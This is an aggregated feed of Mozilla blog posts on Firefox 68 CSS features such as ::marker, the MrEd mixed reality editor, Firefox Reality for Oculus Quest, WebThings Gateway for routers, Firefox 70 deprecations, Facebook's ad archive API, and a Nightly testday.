The headline CSS feature this time round is CSS Scroll Snapping. I won’t spend much time on it here as you can read the blog post for more details. The update in Firefox 68 brings the Firefox implementation in line with Scroll Snap as implemented in Chrome and Safari. In addition, it removes the old properties which were part of the earlier Scroll Snap Points Specification.

The ::marker pseudo-element

The ::marker pseudo-element lets you select the marker box of a list item. This will typically contain the list bullet, or a number. If you have ever used an image as a list bullet, or wrapped the text of a list item in a span in order to have different bullet and text colors, this pseudo-element is for you!

With the marker pseudo-element, you can target the bullet itself. The following code will turn the bullet on unordered lists to hot pink, and make the number on an ordered list item larger and blue.

ul ::marker {
  color: hotpink;

ol ::marker {
  color: blue;
  font-size: 200%;
An ordered and unordered list with styled bullets

With ::marker we can style our list markers

See the CodePen.

There are only a few CSS properties that may be used on ::marker. These include all font properties. Therefore you can change the font-size or family to be something different to the text. You can also color the bullets as shown above, and insert generated content.

Using ::marker on non-list items

A marker can only be shown on list items, however you can turn any element into a list-item by using display: list-item. In the example below I use ::marker, along with generated content and a CSS counter. This code outputs the step number before each h2 heading in my page, preceded by the word “step”. You can see the full example on CodePen.

h2 {
  display: list-item;
  counter-increment: h2-counter;

h2::marker {
  content: "Step: " counter(h2-counter) ". ";

If you take a look at the bug for the implementation of ::marker you will discover that it is 16 years old! You might wonder why a browser has 16 year old implementation bugs and feature requests sitting around. To find out more read through the issue, where you can discover that it wasn’t clear originally if the ::marker pseudo-element would make it into the spec.

There were some Mozilla-specific properties that achieved the result developers were looking for with something like ::marker. The properties ::moz-list-bullet and ::moz-list-marker allowed for the styling of bullets and markers respectively, using a moz- vendor prefix.

The ::marker pseudo-element is standardized in CSS Lists Level 3, and CSS Pseudo-elements Level 4, and currently implemented as of Firefox 68, and Safari. Chrome has yet to implement ::marker. However, in most cases you should be able to use ::marker as an enhancement for those browsers which support it. You can allow the markers to fall back to the same color and size as the rest of the list text where it is not available.

CSS Fixes

It makes web developers sad when we run into a feature which is supported but works differently in different browsers. These interoperability issues are often caused by the sheer age of the web platform. In fact, some things were never fully specified in terms of how they should work. Many changes to our CSS specifications are made due to these interoperability issues. Developers depend on the browsers to update their implementations to match the clarified spec.

Most browser releases contain fixes for these issues, making the web platform incrementally better as there are fewer issues for you to run into when working with CSS. The latest Firefox release is no different – we’ve got fixes for the ch unit, and list numbering shipping.

Developer Tools

In addition to changes to the implementation of CSS in Firefox, Firefox 68 brings you some great new additions to Developer Tools to help you work with CSS.

In the Rules Panel, look for the new print styles button. This button allows you to toggle to the print styles for your document, making it easier to test a print stylesheet that you are working on.

The Print Styles button in the UI highlighted

The print styles icon is top right of the Rules Panel.


Staying with the Rules Panel, Firefox 68 shows an icon next to any invalid or unsupported CSS. If you have ever spent a lot of time puzzling over why something isn’t working, only to realise you made a typo in the property name, this will really help!

A property named flagged invalid in the console

In this example I have spelled padding as “pudding”. There is (sadly) no pudding property so it is highlighted as an error.


The console now shows more information about CSS errors and warnings. This includes a nodelist of places the property is used. You will need to click CSS in the filter bar to turn this on.

The console highlighting a CSS error

My pudding error is highlighted in the Console and I can see I used it on the body element.


So that’s my short roundup of the features you can start to use in Firefox 68. Take a look at the Firefox 68 release notes to get a full overview of all the changes and additions that Firefox 68 brings you.

The post New CSS Features in Firefox 68 appeared first on Mozilla Hacks - the Web developer blog.

Mozilla VR BlogMrEd, an Experiment in Mixed Reality Editing

MrEd, an Experiment in Mixed Reality Editing

We are excited to tell you about our experimental Mixed Reality editor, an experiment we did in the spring to explore online editing in MR stories. What’s that? You haven’t heard of MrEd? Well please allow us to explain.

MrEd, an Experiment in Mixed Reality Editing

For the past several months Blair, Anselm and I have been working on a visual editor for WebXR called the Mixed Reality Editor, or MrEd. We started with this simple premise: non-programmers should be able to create interactive stories and experiences in Mixed Reality without having to embrace the complexity of game engines and other general purpose tools. We are not the first people to tackle this challenge; from visual programming tools to simplified authoring environments, researchers and hobbyists have grappled with this problem for decades.

Looking beyond Mixed Reality, there have been notable successes in other media. In the late 1980s Apple created a ground breaking tool for the Macintosh called Hypercard. It let people visually build applications at a time when programming the Mac required Pascal or assembly. It did this by using the concrete metaphor of a stack of cards. Anything could be turned into a button that would jump the user to another card. Within this simple framework people were able to create eBooks, simple games, art, and other interactive applications. Hypercard’s reliance on declaring possibly large numbers of “visual moments” (cards) and using simple “programming” to move between them is one of the inspirations for MrEd.

We also took inspiration from Twine, a web-based tool for building interactive hypertext novels. In Twine, each moment in the story (seen on the screen) is defined as a passage in the editor as a mix of HTML content and very simple programming expressions executed when a passage is displayed, or when the reader follows a link. Like Hypercard, the author directly builds what the user sees, annotating it with small bits of code to manage the state of the story.

No matter what the medium — text, pictures, film, or MR — people want to tell stories. Mixed Reality needs tools to let people easily tell stories by focusing on the story, not by writing a simulation. It needs content focused tools for authors, not programmers. This is what MrEd tries to be.

Scenes Linked Together

At first glance, MrEd looks a lot like other 3D editors, such as Unity3D or Amazon Sumerian. There is a scene graph on the left, letting authors create scenes, add anchors and attach content elements under them. Select an item in the graph or in the 3D windows, and a property pane appears on the right. Scripts can be attached to objects. And so on. You can position your objects in absolute space (good for VR) or relative to other objects using anchors. An anchor lets you do something like look for this poster in the real world, then position this text next to it, or look for this GPS location and put this model on it. Anchors aren’t limited to basic can also express more semantically meaningful concepts like find the floor and put this on it (we’ll dig into this in another article).

Dig into the scene graph on the left, and differences appear. Instead of editing a single world or game level, MrEd uses the metaphor of a series of scenes (inspired by Twine’s passages and Hypercard’s cards). All scenes in the project are listed, with each scene defining what you see at any given point: shapes, 3D models, images, 2D text and sounds. You can add interactivity by attaching behaviors to objects for things like ‘click to navigate’ and ‘spin around’. The story advances by moving from scene to scene; code to keep track of story state is typically executed on these scene transitions, like Hypercard and Twine. Where most 3D editors force users to build simulations for their experiences, MrEd lets authors create stores that feel more like “3D flip-books”. Within a scene, the individual elements can be animated, move around, and react to the user (via scripts), but the story progresses by moving from scene to scene. While it is possible to create complex individual scenes that begin to feel like a Unity scene, simple stories can be told through sequences of simple scenes.

We built MrEd on Glitch.com, a free web-based code editing and hosting service. With a little hacking we were able to put an entire IDE and document server into a glitch. This means anyone can share and remix their creations with others.

One key feature of MrEd is that it is built on top of a CRDT data structure to enable editing the same project on multiple devices simultaneously. This feature is critical for Mixed Reality tools because you are often switching between devices during development; the networked CRDT underpinnings also mean that logging messages from any device appear in any open editor console viewing that project, simplifying distributed development. We will tell you more details about the CRDT and Glitch in future posts.

We ran a two week class with a group of younger students in Atlanta using MrEd. The students were very interested in telling stories about their school, situating content in space around the buildings, and often using memes and ideas that were popular for them. We collected feedback on features, bugs and improvements and learned a lot from how the students wanted to use our tool.

Lessons Learned

As I said, this was an experiment, and no experiment is complete without reporting on what we learned. So what did we learn? A lot! And we are going to share it with you over the next couple of blog posts.

First we learned that idea of building a 3D story from a sequence of simple scenes worked for novice MR authors: direct manipulation with concrete metaphors, navigation between scenes as a way of telling stories, and the ability to easily import images and media from other places. The students were able to figure it out. Even more complex AR concepts like image targets and geospatial anchors were understandable when turned into concrete objects.

MrEd’s behaviors scripts are each a separate Javascript file and MrEd generates the property sheet from the definition of the behavior in the file, much like Unity’s behaviors. Compartmentalizing them in separate files means they are easy to update and share, and (like Unity) simple scripts are a great way to add interactivity without requiring complex coding. We leveraged Javascript’s runtime code parsing and execution to support scripts with simple code snippets as parameters (e.g., when the user finds a clue by getting close to it, a proximity behavior can set a global state flag to true, without requiring a new script to be written), while still giving authors the option to drop down to Javascript when necessary.

Second, we learned a lot about building such a tool. We really pushed Glitch to the limit, including using undocumented APIs, to create an IDE and doc server that is entirely remixable. We also built a custom CRDT to enable shared editing. Being able to jump back and forth between a full 2d browser with a keyboard and then XR Viewer running on an ARKit enabled iPhone is really powerful. The CRDT implementation makes this type of real time shared editing possible.

Why we are done

MrEd was an experiment in whether XR metaphors can map cleanly to a Hypercard-like visual tool. We are very happy to report that the answer is yes. Now that our experiment is over we are releasing it as open source, and have designed it to run in perpetuity on Glitch. While we plan to do some code updates for bug fixes and supporting the final WebXR 1.0 spec, we have no current plans to add new features.

Building a community around a new platform is difficult and takes a long time. We realized that our charter isn’t to create platforms and communities. Our charter is to help more people make Mixed Reality experiences on the web. It would be far better for us to help existing platforms add WebXR than for us to build a new community around a new tool.

Of course the source is open and freely usable on Github. And of course anyone can continue to use it on Glitch, or host their own copy. Open projects never truly end, but our work on it is complete. We will continue to do updates as the WebXR spec approaches 1.0, but there won’t be any major changes.

Next Steps

We are going to polish up the UI and fix some remaining bugs. MrEd will remain fully usable on Glitch, and hackable on GitHub. We also want to pull some of the more useful chunks into separate components, such as the editing framework and the CRDT implementation. And most importantly, we are going to document everything we learned over the next few weeks in a series of blogs.

If you are interested in integrating WebXR into your own rapid prototyping / educational programming platform, then please let us know. We are very happy to help you.

You can try MrEd live by remixing the Glitch and setting a password in the .env file. You can get the source from the main MrEd github repo, and the source for the glitch from the base glitch repo.

Mozilla VR BlogFirefox Reality for Oculus Quest

Firefox Reality for Oculus Quest

We are excited to announce that Firefox Reality is now available for the Oculus Quest!

Following our releases for other 6DoF headsets including the HTC Vive Focus Plus and Lenovo Mirage, we are delighted to bring the Firefox Reality VR web browsing experience to Oculus' newest headset.

Whether you’re watching immersive video or meeting up with friends in Mozilla Hubs, Firefox Reality takes advantage of the Oculus Quest’s boost in performance and capabilities to deliver the best VR web browsing experience. Try the new featured content on the FxR home page or build your own to see what you can do in the next generation of standalone virtual reality headsets.
Firefox Reality for Oculus Quest

Enhanced Tracking Protection Blocks Sites from Tracking You
To protect our users from the pervasive tracking and collection of personal data by ad networks and tech companies, Firefox Reality has Enhanced Tracking Protection enabled by default. We strongly believe privacy shouldn’t be relegated to optional settings. As an added bonus, these protections work in the background and actually increase the speed of the browser.
Firefox Reality for Oculus Quest

Firefox Reality is available in 10 different languages, including Japanese, Korean, Simplified Chinese and Traditional Chinese, with more on the way. You can also use your voice to search the web instead of typing, making it faster and easier to get where you want to go.
Firefox Reality for Oculus Quest

Stay tuned in the coming months as we roll out support for the nearly VR-ready WebXR specification, multi-window browsing, bookmarks sync, additional language support and other exciting new features.

Like all Firefox browser products, Firefox Reality is available for free in the Oculus Quest store.

For more information: https://mixedreality.mozilla.org/firefox-reality/

hacks.mozilla.orgWebThings Gateway for Wireless Routers

Wireless Routers

In April we announced that the Mozilla IoT team had been working on evolving WebThings Gateway into a full software distribution for consumer wireless routers.

Today, with the 0.9 release, we’re happy to announce the availability of the first experimental builds for our first target router hardware, the Turris Omnia.

Turris Omnia wireless router

Turris Omnia wireless router. Source: turris.cz

These builds are based on the open source OpenWrt operating system. They feature a new first-time setup experience which enables you to configure the gateway as a router and Wi-Fi access point itself, rather than connecting to an existing Wi-Fi network.

Router first time setup

Router first time setup

So far, these experimental builds only offer extremely basic router configuration and are not ready to replace your existing wireless router. This is just our first step along the path to creating a full software distribution for wireless routers.

Router network settings

Router network settings

We’re planning to add support for other wireless routers and router developer boards in the near future. We want to ensure that the user community can access a range of affordable developer hardware.

Raspberry Pi 4

As well as these new OpenWrt builds for routers, we will continue to support the existing Raspbian-based builds for the Raspberry Pi. In fact, the 0.9 release is also the first version of WebThings Gateway to support the new Raspberry Pi 4. You can now find a handy download link on the Raspberry Pi website.

Raspberry Pi 4 Model B

Raspberry Pi 4 Model B. Source: raspberrypi.org

Notifier Add-ons

Another feature landing in the 0.9 release is a new type of add-on called notifier add-ons.

Notifier Add-ons

Notifier Add-ons

In previous versions of the gateway, the only way you could be notified of events was via browser push notifications. Unfortunately, this is not supported by all browsers, nor is it always the most convenient notification mechanism for users.

A workaround was available by creating add-ons with basic “send notification” actions to implement different types of notifications. However, these required the user to add “things” to their gateway which didn’t represent actual devices and actions had to be hard-coded in the add-on’s configuration.

To remedy this, we have introduced notifier add-ons. Essentially, a notifier creates a set of “outlets”, each of which can be used as an output for a rule. For example, you can now set up a rule to send you an SMS or an email when motion is detected in your home. Notifiers can be configured with a title, a message and a priority level. This allows users to be reached where and how they want, with a message and priority that makes sense to them.

Rule with email notification

Rule with email notification

API Changes

For developers, the 0.9 release of the WebThings Gateway and 0.12 release of the WebThings Framework libraries also bring some small changes to Thing Descriptions. This will bring us more in line with the latest W3C drafts.

One small difference to be aware of is that “name” is now called “title”. There are also some experimental new base, security and securityDefinitions properties of the Thing Descriptions exposed by the gateway, which are still under active discussion at the W3C.

Give it a try!

We invite you to download the new WebThings Gateway 0.9 and continue to build your own web things with the latest WebThings Framework libraries. If you already have WebThings Gateway installed on a Raspberry Pi, it should update itself automatically.

As always, we welcome your feedback on Discourse. Please submit issues and pull requests on GitHub.

The post WebThings Gateway for Wireless Routers appeared first on Mozilla Hacks - the Web developer blog.

Mozilla Add-ons BlogUpcoming deprecations in Firefox 70

Several planned code deprecations for Firefox 70, currently available on the Nightly pre-release channel, may impact extension and theme developers. Firefox 70 will be released on October 22, 2019.

Aliased theme properties to be removed

In Firefox 65, we started deprecating the aliased theme properties accentcolor, textcolor, and headerURL. These properties will be removed in Firefox 70.

Themes listed on addons.mozilla.org (AMO) will be automatically updated to use supported properties. Most themes were updated back in April, but new themes have been created using the deprecated properties. If your theme is not listed on AMO, or if you are the developer of a dynamic theme, please update your theme’s manifest.json to use the supported properties.

  • For accentcolor, please use frame
  • For headerURL, please use theme_frame
  • For textcolor, please use tab_background_text

JavaScript deprecations

In Firefox 70, the non-standard, Firefox-specific Array generic methods introduced with JavaScript 1.6 will be considered deprecated and scheduled for removal in the near future. For more information about which generics will be removed and suggested alternatives, please see the Firefox Site Compatibility blog.

The Site Compatibility working group also intends to remove the non-standard prototype toSource and uneval by the end of 2019.

The post Upcoming deprecations in Firefox 70 appeared first on Mozilla Add-ons Blog.

The Mozilla BlogEmpowering voters to combat election manipulation

For the last year, Mozilla has been looking for ways to empower voters in light of the shifts in election dynamics caused by the internet and online advertising. This work included our participation in the EU’s Code of Practice on Disinformation to push for change in the industry which led to the launch of the Firefox EU Elections toolkit that provided people information on the voting process, how tracking and opaque online advertising influence their voting behavior and how they can easily protect themselves.

We also had hoped to lend our technical expertise to create an analysis dashboard that would help researchers and journalists monitor the elections. The dashboard would gather data on the political ads running on various platforms and provide a concise “behind the scenes” look at how these ads were shared and targeted.

But to achieve this we needed the platforms to follow through on their own commitment to make the data available through their Ad Archive APIs.

Here’s what happened.

Platforms didn’t supply sufficient data

On March 29, Facebook began releasing its political ad data through a publicly available API. We quickly concluded the API was inadequate.

  • Targeting information was not available.
  • Bulk data access was not offered.
  • Data wasn’t tagged properly.
  • Identical searches would produce wildly differing results.

The state of the API made it nearly impossible to extract the data needed to populate the dashboard we were hoping to create to make this information more accessible.

And although Google didn’t provide the targeting criteria advertisers use on the platform, it did provide access to the data in a format that allowed for real research and analysis.

That was not the case for Facebook.

So then what?

It took the entire month of April to figure out ways to work within or rather, around, the API to collect any information about the political ads running on the Facebook platform.

After several weeks, hundreds of hours, and thousands of keystrokes, the Mozilla team created the EU Ad Transparency Reports. The reports contained aggregated statistics on spending and impressions about political ads on Facebook, Instagram, Google, and YouTube.

While this was not the dynamic tool we had envisioned at the beginning of this journey, we hoped it would help.

But despite our best efforts to help Facebook debug their system, the API broke again from May 18 through May 26, making it impossible to use the API and generate any reports in the last days leading up to the elections.

All of this was documented through dozens of bug reports provided to Facebook, identifying ways the API needed to be fixed.

A Roadmap for Facebook

Ultimately our contribution to this effort ended up looking very different than what we had first set out to do. Instead of a tool, we have detailed documentation of every time the API failed and every roadblock encountered and a series of tips and tricks to help others use the API.

This documentation provides Facebook a clear roadmap to make the necessary improvements for a functioning and useful API before the next election takes place. The EU elections have passed, but the need for political messaging transparency has not.

In fact, important elections are expected to take place almost every month until the end of the year and Facebook has recently rolled this tool out globally.

We need Facebook to be better. We need an API that actually helps – not hinders – researchers and journalists uncover who is buying ads, the way these ads are being targeted and to whom they’re being served. It’s this important work that informs the public and policymakers about the nature and consequences of misinformation.

This is too important to get wrong. That is why we plan to continue our work on this matter and continue to work with those pushing to shine a light on how online advertising impact elections.

The post Empowering voters to combat election manipulation  appeared first on The Mozilla Blog.

QMOFirefox Nightly 70 Testday Results

Hello Mozillians!

As you may already know, last Friday – July 19th – we held a new Testday event, for Firefox Nightly 70.

Thank you all for helping us make Mozilla a better place: gaby2300, maria plachkova and Fernando noelonassis.


– several test cases executed for Fission. 

– 1 bug verified: 1564267

Thanks for another successful testday 🙂

We hope to see you all in our next events, all the details will be posted on QMO!